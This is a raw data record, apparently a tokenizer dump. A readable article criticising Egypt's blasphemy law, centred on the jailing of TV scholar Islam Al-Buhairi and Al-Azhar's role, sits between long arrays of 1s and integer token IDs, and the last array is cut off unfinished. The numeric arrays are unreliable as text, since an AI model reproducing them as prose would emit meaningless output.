1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Egypt’s controversial blasphemy law strikes down on free Islamic thought What's that again? Blasphemy law? An Egyptian court has sentenced the Islamic scholar and theologian Islam Al-Buhairi to one year in prison for blasphemy. Al-Buhairi was accused of insulting Islam in his TV show “With Islam Al-Buhairi” on the Al-Qahira wa Al-Nas channel. Al-Buhairi questioned the “Islamic heritage”, which angered the Al-Azhar scholarship. The sentence against Al-Buhairi was softened from five years to one year. Al-Buhairi’s lawyer Jamil Saad told AFP: “Islam Al-Buhairi didn’t insult religions because the pillars of Islam are the Quran, Allah and the Day of Judgment and he didn’t come close to these circles at all.” Engaged in a demonstration of Egyptian liberal intellectuals against the conviction of Al-Buhairi, Sheikh Muhammad Abdullah Nasr said: “Blasphemy is a fascist law. It is a legacy of the Spanish inquisition courts.” But what did Al-Buhairi really do? Al-Buhairi’s Blasphemy Al-Buhairi criticised several books of Islamic interpretation, which according to him include radical interpretations of the Quran and the Sunnah. Al-Buhairi argued in his program that these radical interpretations constitute the basis for extremist organizations such as the Islamic State and Al-Qaeda. According to Al-Buhairi, the followers of the prophet Muhammad are the ones who were born or converted to Islam after the demise of the Prophet Muhammad. “The followers (of the prophet) have no sanctity. They were men and we are men,” said Al-Buhairi referring to the need of scrutinizing the hadith collections of Mohammad Al-Bukhari and Muslim Al-Hajjaj, Persian Islamic scholars who lived in the ninth century. The former authored the hadith collection Sahih Al-Bukhari including 7257 sayings and acts of the prophet Muhammad, whereas the latter authored the hadith collection Sahih Muslim including 9200 acts and sayings of the prophet Muhammad. Al-Buhairi called for examining the interpretations of other men. He also demanded from Islamic scholars to stop taking Islamic sources for granted because they sometimes contain discriminatory, violence-inciting and illogical arguments. “They had opinions which we would never be able to imagine. This is what we inherited. “All the bloodiness, killing, sectarianism, backwardness and extremism we are living have jurisprudential basis and are not related to the manuscript,” Al-Buhairi explained. Furthermore, Al-Buhairi accused the Grand Imam of Al-Azhar Sheikh Ahmed Al-Tayeb of doing nothing to reform traditional curriculum of Al-Azhar and to limit the Muslim Brotherhood’s influence in Al-Azhar.Fatwas (Islamic rulings) of Al-Azhar, Al-Buhairi claims, don’t cope with contemporary developments and ways of life followed by the Egyptian citizens. Al-Azhar’s Debate with Al-Buhairi While Al-Azhar refused to call ISIS militants infidels (Kafer) claiming not to have the right to call Muslims infidels no matter what their sins were, Al-Azhar initiated court proceedings against Al-Buhairi. Consequently, Al-Azhar committee, on behalf of Ahmed Al-Tayeb, filed a case against Al-Buhari in April 2015 for “calling the precepts of religion in question and inciting a communal strife among Muslims.” Media Centre of Al-Azhar told Egypt Independent in 2015 that Al-Azhar’s position rejects Al-Buhairi’s views describing him as abnormal and deliberately undermining the imams and scholars of Islam. Al-Buhairi, according to Al-Azhar scholarship, is ignorant or unaware of the great Islamic heritage, which has enriched the Islamic library and even the world. The Egyptian hardline Salafist Abu Ishaq Al-Huwaini described Al-Buhairi last year as an ignorant person, who thinks “Christians are not infidels”. The Salafi Muhammad Hassan said: “Throughout history, those who fought against Allah and his messenger have never succeeded.” It is noteworthy that after hundreds of years as an independent institution, Al-Azhar was nationalized in 1961 by former President Jamal Abdel Nasser. Since that time, Al-Azhar has become inseparable from the government. It has become the official institution to oversee cultural and educational materials related to the Islamic faith. Al-Sisi’s Islamic Revolution In a speech to Al-Azhar scholars on 1 January 2015, Abdulfattah Al-Sisi said: “We are in need of a religious revolution (…) That thinking — I am not saying “religion” but “thinking” — that corpus of texts and ideas that we have sacralised over the years, to the point that departing from them has become almost impossible, is antagonizing the entire world.” Al-Buhairi’s statements can be seen as a part of a campaign to renew the Islamic discourse initiated by Al-Sisi upon his presidential win in 2014. Controversially, Al-Sisi needs Al-Azhar, which is responsible for the content of sermons in more than 140,000 mosques across Egypt. Thus Al-Sisi pointed out clearly that all changes in religious discourse should be within the framework of the state apparatus and headed by Al-Azhar institution. In response to Al-Buhairi’s thoughts, Al-Sisi said in April 2015 that: “When I spoke about religious discourse, I just posed a title and did not go into detail,” claiming that he doesn’t agree with Al-Buhairi’s statements. Blasphemous Critical Thinking While a spirit of critical thinking can be detected in the writings of many Egyptian intellectuals about sensitive religion related topics, these intellectuals have been systematically subjected to hate campaigns and crimes according to the Human Rights Watch. Here are two examples: The story of professor Farag Foda in the beginning of the 1990s, an activist in the field of human rights, is a case in point. He was assassinated by Al-Jama’a Al-Islamiyya in 1992 not because of his atheism and infidelity but because of his harsh criticism of the violence of the armed Islamic groups. While Foda was a critic of religious intolerance, his murderers, religious zealots, proved him right. The killers didn’t like Foda’s writings, so they killed him. The Egyptian liberal theologian and university professor Nasr Hamid Abu Zayd also suffered a major religious persecution in the 1990s and had to flee to the Netherlands.The crime of Abu Zayd was his academic work. When certain individuals refused to accept his academic research, they took it to the Egyptian court instead of the Egyptian debate. The court declared him an apostate and based on this sentence, he was not to remain married to his wife Ibtihal Younis, a French literature professor. The logic behind the forced divorce is that Muslim women are not permissible to marry non-Muslims. Constitutionally, blasphemy (contempt of monotheistic religions) is based on the article 98 of the Egyptian Penal Code, which was added in 1982 and then amended in 2006. According to this law, citizens who insult or ridicule heavenly religions, propagate extreme ideas for the purpose of inciting strife or contribute to damaging national unity can be confined for a period of no less than six months and no more than five years. This is, in other words, a legal licence for the Egyptian state and its religious institution to persecute its own intellectuals.
[ 1, 12892, 30010, 29879, 19341, 616, 1999, 294, 561, 6764, 4307, 19492, 267, 1623, 373, 3889, 16427, 293, 2714, 13, 13, 5618, 29915, 29879, 393, 1449, 29973, 3164, 294, 561, 6764, 4307, 29973, 13, 13, 2744, 12892, 713, 8973, 756, 2665, 9223, 278, 16427, 293, 21344, 322, 278, 1189, 713, 16427, 838, 29899, 3727, 23535, 374, 304, 697, 1629, 297, 8475, 363, 1999, 294, 561, 6764, 29889, 838, 29899, 3727, 23535, 374, 471, 28886, 310, 1663, 499, 292, 16427, 297, 670, 5648, 1510, 1346, 3047, 16427, 838, 29899, 3727, 23535, 374, 30024, 373, 278, 838, 29899, 29984, 801, 3055, 11324, 838, 29899, 29940, 294, 8242, 29889, 838, 29899, 3727, 23535, 374, 1139, 287, 278, 1346, 29902, 2536, 314, 293, 902, 16639, 9363, 607, 27343, 287, 278, 838, 29899, 16748, 8222, 21344, 3527, 29889, 13, 13, 1576, 10541, 2750, 838, 29899, 3727, 23535, 374, 471, 4964, 6419, 515, 5320, 2440, 304, 697, 1629, 29889, 838, 29899, 3727, 23535, 374, 30010, 29879, 25008, 435, 1344, 5701, 328, 5429, 23844, 29925, 29901, 1346, 29902, 2536, 314, 838, 29899, 3727, 23535, 374, 3282, 30010, 29873, 1663, 499, 4931, 1080, 1363, 278, 22549, 1503, 310, 16427, 526, 278, 660, 332, 273, 29892, 838, 8083, 322, 278, 8373, 310, 8660, 19422, 322, 540, 3282, 30010, 29873, 2041, 3802, 304, 1438, 22558, 472, 599, 3178, 13, 13, 8100, 4063, 297, 263, 9004, 362, 310, 12892, 713, 26054, 18715, 27101, 2750, 278, 7602, 2463, 310, 838, 29899, 3727, 23535, 374, 29892, 2296, 28464, 29610, 17860, 352, 8083, 22318, 29878, 1497, 29901, 1346, 29933, 3333, 561, 6764, 338, 263, 21028, 391, 4307, 29889, 739, 338, 263, 25000, 310, 278, 10432, 297, 23493, 28033, 3178, 13, 13, 6246, 825, 1258, 838, 29899, 3727, 23535, 374, 2289, 437, 29973, 13, 13, 2499, 29899, 3727, 23535, 374, 30010, 29879, 3164, 294, 561, 6764, 13, 13, 2499, 29899, 3727, 23535, 374, 11164, 3368, 3196, 8277, 310, 16427, 293, 19854, 29892, 607, 5034, 304, 1075, 3160, 24818, 6613, 800, 310, 278, 660, 332, 273, 322, 278, 317, 5963, 801, 29889, 838, 29899, 3727, 23535, 374, 28705, 297, 670, 1824, 393, 1438, 24818, 6613, 800, 1040, 12356, 278, 8405, 363, 9413, 391, 25700, 1316, 408, 278, 16427, 293, 4306, 322, 838, 29899, 29984, 29874, 8710, 29889, 13, 13, 7504, 3278, 304, 838, 29899, 3727, 23535, 374, 29892, 278, 1101, 414, 310, 278, 27953, 300, 29610, 526, 278, 6743, 1058, 892, 6345, 470, 11543, 304, 16427, 1156, 278, 1261, 895, 310, 278, 1019, 561, 300, 29610, 29889, 13, 13, 30015, 1576, 1101, 414, 313, 974, 278, 27953, 300, 29897, 505, 694, 9753, 312, 537, 29889, 2688, 892, 1757, 322, 591, 526, 1757, 3995, 1497, 838, 29899, 3727, 23535, 374, 16811, 304, 278, 817, 310, 14387, 329, 262, 5281, 278, 750, 389, 16250, 310, 12929, 4850, 328, 838, 29899, 29933, 2679, 29882, 1306, 322, 23772, 838, 29899, 29950, 1175, 29926, 1175, 29892, 9034, 713, 16427, 293, 1364, 324, 1503, 1058, 10600, 297, 278, 17081, 386, 6462, 29889, 13, 13, 1576, 4642, 4148, 287, 278, 750, 389, 4333, 24246, 4861, 838, 29899, 29933, 2679, 29882, 1306, 3704, 29871, 29955, 29906, 29945, 29955, 1827, 886, 322, 14741, 310, 278, 27953, 300, 29610, 29892, 13452, 278, 7480, 4148, 287, 278, 750, 389, 4333, 24246, 4861, 23772, 3704, 29871, 29929, 29906, 29900, 29900, 14741, 322, 1827, 886, 310, 278, 27953, 300, 29610, 29889, 13, 13, 2499, 29899, 3727, 23535, 374, 2000, 363, 4392, 2827, 278, 6613, 800, 310, 916, 1757, 29889, 940, 884, 24432, 515, 16427, 293, 1364, 324, 1503, 304, 5040, 5622, 16427, 293, 8974, 363, 16896, 1363, 896, 6041, 1712, 2313, 20386, 7606, 29892, 21448, 29899, 3742, 11407, 322, 980, 1188, 936, 6273, 29889, 13, 13, 30015, 15597, 750, 26971, 607, 591, 723, 2360, 367, 2221, 304, 14034, 29889, 910, 338, 825, 591, 23878, 29889, 13, 13, 30015, 3596, 278, 10416, 3335, 29892, 23393, 29892, 21149, 13956, 1608, 29892, 1250, 1328, 2264, 322, 9413, 1608, 591, 526, 8471, 505, 24894, 558, 566, 2556, 8405, 322, 526, 451, 4475, 304, 278, 27593, 3995, 838, 29899, 3727, 23535, 374, 10824, 29889, 13, 13, 29943, 332, 721, 5514, 29892, 838, 29899, 3727, 23535, 374, 28886, 278, 6265, 1954, 314, 310, 838, 29899, 16748, 8222, 2296, 28464, 9070, 2168, 838, 29899, 29911, 388, 774, 310, 2599, 3078, 304, 11736, 13807, 16256, 12906, 398, 310, 838, 29899, 16748, 8222, 322, 304, 4046, 278, 23772, 4358, 721, 6614, 30010, 29879, 9949, 297, 838, 29899, 16748, 8222, 29889, 29943, 271, 11102, 313, 29902, 2536, 314, 293, 364, 352, 886, 29897, 310, 838, 29899, 16748, 8222, 29892, 838, 29899, 3727, 23535, 374, 16726, 29892, 1016, 30010, 29873, 1302, 412, 411, 24952, 2693, 1860, 322, 5837, 310, 2834, 5643, 491, 278, 12892, 713, 18363, 29889, 13, 13, 2499, 29899, 16748, 8222, 30010, 29879, 7089, 403, 411, 838, 29899, 3727, 23535, 374, 13, 13, 8809, 488, 838, 29899, 16748, 8222, 15964, 304, 1246, 8519, 3235, 5549, 1934, 3041, 333, 1379, 313, 29968, 29874, 571, 29897, 5995, 292, 451, 304, 505, 278, 1492, 304, 1246, 23772, 29879, 3041, 333, 1379, 694, 4383, 825, 1009, 269, 1144, 892, 29892, 838, 29899, 16748, 8222, 14511, 630, 8973, 8469, 886, 2750, 838, 29899, 3727, 23535, 374, 29889, 1281, 27284, 29892, 838, 29899, 16748, 8222, 21118, 29892, 373, 2306, 3131, 310, 9070, 2168, 838, 29899, 29911, 388, 774, 29892, 934, 29881, 263, 1206, 2750, 838, 29899, 3727, 29882, 1306, 297, 3786, 29871, 29906, 29900, 29896, 29945, 363, 1346, 4804, 292, 278, 758, 1547, 29879, 310, 13433, 297, 1139, 322, 5528, 11407, 263, 3817, 284, 851, 1607, 4249, 23772, 29879, 3178, 13, 13, 10572, 11319, 310, 838, 29899, 16748, 8222, 5429, 12892, 25266, 297, 29871, 29906, 29900, 29896, 29945, 393, 838, 29899, 16748, 8222, 30010, 29879, 2602, 12560, 29879, 838, 29899, 3727, 23535, 374, 30010, 29879, 8386, 20766, 1075, 408, 633, 8945, 322, 23663, 2486, 563, 837, 2827, 278, 527, 2232, 322, 1364, 324, 1503, 310, 16427, 29889, 838, 29899, 3727, 23535, 374, 29892, 5034, 304, 838, 29899, 16748, 8222, 21344, 3527, 29892, 338, 16245, 424, 470, 1185, 2519, 310, 278, 2107, 16427, 293, 902, 16639, 29892, 607, 756, 427, 4018, 287, 278, 16427, 293, 3489, 322, 1584, 278, 3186, 29889, 13, 13, 1576, 12892, 713, 2898, 1220, 3956, 2142, 391, 1976, 29884, 306, 17051, 29939, 838, 29899, 29950, 7262, 475, 29875, 5439, 838, 29899, 3727, 23535, 374, 1833, 1629, 408, 385, 16245, 424, 2022, 29892, 1058, 22405, 1346, 18687, 5834, 526, 451, 3041, 333, 1379, 8643, 450, 3956, 2142, 29875, 29610, 27558, 273, 1497, 29901, 1346, 29911, 1092, 820, 449, 4955, 29892, 1906, 1058, 20722, 2750, 838, 8083, 322, 670, 4473, 15109, 505, 2360, 14792, 3178, 13, 13, 3112, 338, 451, 809, 2072, 29891, 393, 1156, 21006, 310, 2440, 408, 385, 7417, 12666, 29892, 838, 29899, 16748, 8222, 471, 4797, 1891, 297, 29871, 29896, 29929, 29953, 29896, 491, 4642, 7178, 16131, 284, 1976, 6144, 405, 9498, 29889, 4001, 393, 931, 29892, 838, 29899, 16748, 8222, 756, 4953, 297, 25048, 519, 515, 278, 5874, 29889, 739, 756, 4953, 278, 6221, 12666, 304, 975, 4149, 16375, 322, 28976, 17279, 4475, 304, 278, 16427, 293, 10847, 29889, 13, 13, 2499, 29899, 29903, 10770, 30010, 29879, 16427, 293, 14595, 13, 13, 797, 263, 12032, 304, 838, 29899, 16748, 8222, 1364, 324, 1503, 373, 29871, 29896, 5490, 29871, 29906, 29900, 29896, 29945, 29892, 17860, 16302, 1131, 801, 838, 29899, 29903, 10770, 1497, 29901, 1346, 4806, 526, 297, 817, 310, 263, 12962, 19479, 313, 30098, 29897, 2193, 7291, 813, 306, 626, 451, 5934, 1346, 2674, 335, 291, 30024, 541, 1346, 386, 18159, 30024, 813, 393, 1034, 13364, 310, 26442, 322, 7014, 393, 591, 505, 7067, 1705, 3368, 975, 278, 2440, 29892, 304, 278, 1298, 393, 5840, 292, 515, 963, 756, 4953, 4359, 9301, 29892, 338, 3677, 12841, 5281, 278, 4152, 3186, 3178, 13, 13, 2499, 29899, 3727, 23535, 374, 30010, 29879, 9506, 508, 367, 3595, 408, 263, 760, 310, 263, 11531, 304, 23011, 278, 16427, 293, 2313, 10242, 14511, 630, 491, 838, 29899, 29903, 10770, 2501, 670, 6673, 616, 5401, 297, 29871, 29906, 29900, 29896, 29946, 29889, 2866, 307, 874, 616, 368, 29892, 838, 29899, 29903, 10770, 4225, 838, 29899, 16748, 8222, 29892, 607, 338, 14040, 363, 278, 2793, 310, 724, 29885, 787, 297, 901, 1135, 29871, 29896, 29946, 29900, 29892, 29900, 29900, 29900, 19767, 1912, 4822, 12892, 29889, 6549, 838, 29899, 29903, 10770, 11520, 714, 9436, 393, 599, 3620, 297, 12962, 2313, 10242, 881, 367, 2629, 278, 6890, 310, 278, 2106, 7132, 2389, 322, 2343, 287, 491, 838, 29899, 16748, 8222, 12666, 29889, 13, 13, 797, 2933, 304, 838, 29899, 3727, 23535, 374, 30010, 29879, 13133, 29892, 838, 29899, 29903, 10770, 1497, 297, 3786, 29871, 29906, 29900, 29896, 29945, 393, 29901, 1346, 10401, 306, 12707, 1048, 12962, 2313, 10242, 29892, 306, 925, 926, 287, 263, 3611, 322, 1258, 451, 748, 964, 9493, 3995, 5995, 292, 393, 540, 1838, 30010, 29873, 8661, 411, 838, 29899, 3727, 23535, 374, 30010, 29879, 9506, 29889, 13, 13, 29933, 3333, 561, 331, 681, 15976, 936, 498, 18159, 13, 13, 8809, 488, 263, 8548, 310, 12187, 7291, 508, 367, 17809, 297, 278, 2044, 886, 310, 1784, 12892, 713, 18715, 27101, 1048, 20502, 13433, 4475, 23820, 29892, 1438, 18715, 27101, 505, 1063, 1788, 19574, 4967, 287, 304, 26277, 11531, 29879, 322, 2181, 1355, 5034, 304, 278, 12968, 26863, 24274, 29889, 2266, 526, 1023, 6455, 29901, 13, 13, 1576, 5828, 310, 12251, 8413, 351, 383, 8887, 297, 278, 6763, 310, 278, 29871, 29896, 29929, 29929, 29900, 29879, 29892, 385, 5039, 391, 297, 278, 1746, 310, 5199, 10462, 29892, 338, 263, 1206, 297, 1298, 29889, 940, 471, 20105, 262, 630, 491, 838, 29899, 29967, 3304, 30010, 29874, 838, 29899, 29902, 2536, 4479, 29891, 3761, 297, 29871, 29896, 29929, 29929, 29906, 451, 1363, 310, 670, 472, 354, 1608, 322, 3041, 10652, 537, 541, 1363, 310, 670, 4023, 845, 29035, 310, 278, 21448, 310, 278, 23926, 16427, 293, 6471, 29889, 5806, 383, 8887, 471, 263, 11164, 310, 12962, 938, 324, 261, 749, 29892, 670, 13406, 414, 29892, 12962, 3777, 284, 1862, 29892, 11827, 1075, 1492, 29889, 450, 12088, 414, 3282, 30010, 29873, 763, 383, 8887, 30010, 29879, 2044, 886, 29892, 577, 896, 9445, 1075, 29889, 13, 13, 1576, 12892, 713, 26054, 278, 1189, 713, 322, 16372, 12251, 22318, 29878, 7904, 333, 1976, 29884, 796, 388, 29881, 884, 17654, 263, 4655, 12962, 639, 3471, 918, 297, 278, 29871, 29896, 29929, 29929, 29900, 29879, 322, 750, 304, 9115, 29872, 304, 278, 24553, 29889, 1576, 17268, 310, 1976, 29884, 796, 388, 29881, 471, 670, 21567, 664, 29889, 1932, 3058, 15724, 15964, 304, 3544, 670, 21567, 5925, 29892, 896, 3614, 372, 304, 278, 12892, 713, 8973, 2012, 310, 278, 12892, 713, 27836, 29889, 450, 8973, 8052, 1075, 385, 18115, 403, 322, 2729, 373, 445, 10541, 29892, 540, 471, 451, 304, 3933, 8300, 304, 670, 6532, 29739, 2034, 4077, 887, 6994, 29892, 263, 5176, 12845, 12251, 29889, 450, 5900, 5742, 278, 11826, 25074, 346, 338, 393, 23772, 5866, 526, 451, 3635, 790, 1821, 304, 20479, 1661, 29899, 14958, 2576, 29879, 29889, 13, 13, 12075, 5008, 635, 29892, 1999, 294, 561, 6764, 313, 1285, 3456, 310, 1601, 10323, 4695, 4931, 1080, 29897, 338, 2729, 373, 278, 4274, 29871, 29929, 29947, 310, 278, 12892, 713, 7363, 284, 5920, 29892, 607, 471, 2715, 297, 29871, 29896, 29929, 29947, 29906, 322, 769, 626, 2760, 297, 29871, 29906, 29900, 29900, 29953, 29889, 7579, 304, 445, 4307, 29892, 18363, 1058, 1663, 499, 470, 8177, 293, 1297, 18356, 368, 4931, 1080, 29892, 13089, 403, 18677, 7014, 363, 278, 6437, 310, 5528, 11407, 851, 1607, 470, 29126, 304, 5625, 6751, 4797, 20107, 508, 367, 1970, 1312, 363, 263, 3785, 310, 694, 3109, 1135, 4832, 7378, 322, 694, 901, 1135, 5320, 2440, 29889, 910, 338, 29892, 297, 916, 3838, 29892, 263, 11706, 7794, 663, 363, 278, 12892, 713, 2106, 322, 967, 12962, 12666, 304, 639, 3471, 1082, 967, 1914, 18715, 27101, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 